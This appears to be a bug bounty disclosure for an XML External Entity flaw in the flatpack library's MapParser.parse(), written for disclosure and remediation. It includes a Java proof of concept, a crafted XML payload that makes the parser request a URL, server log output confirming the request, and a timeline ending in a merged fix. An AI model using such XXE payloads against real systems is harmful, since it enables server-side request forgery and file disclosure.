Improper Restriction of XML External Entity Reference in appendium/flatpack

Valid

Reported on

Oct 18th 2021


Description

The flatpack vulnerable to XML External Entity (XXE). An attacker that is able to provide a crafted XML file as input to the parse() function in the MapParser.java file may allow an attacker to execute XML External Entities (XXE).

Proof of Concept

import java.io.File;
import java.io.FileReader;
import java.io.Reader;

import net.sf.flatpack.xml.*;


public class Poc {

    @SuppressWarnings({ "unused" })
    public static void main(String[] args) {
        try {
            Reader reader = new FileReader("C:\\Users\\srika\\eclipse-workspace\\poc\\src\\main\\resources\\sample-ssrf.xml");
            MapParser.parse(reader, null);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

sample-ssrf.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:8800/test.txt">]>
<foo>&xxe;</foo>

#Output

Serving HTTP on :: port 8800 (http://[::]:8800/) ...
::ffff:127.0.0.1 - - [18/Oct/2021 15:10:34] "GET /test.txt HTTP/1.1" 200 -
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
a month ago
We have contacted a member of the appendium/flatpack team and are waiting to hear back a month ago
We have sent a follow up to the appendium/flatpack team. We will try again in 7 days. a month ago
Benoit Xhenseval validated this vulnerability a month ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
Benoit Xhenseval confirmed that a fix has been merged on 5ebef7 a month ago
Srikanth Prathi has been awarded the fix bounty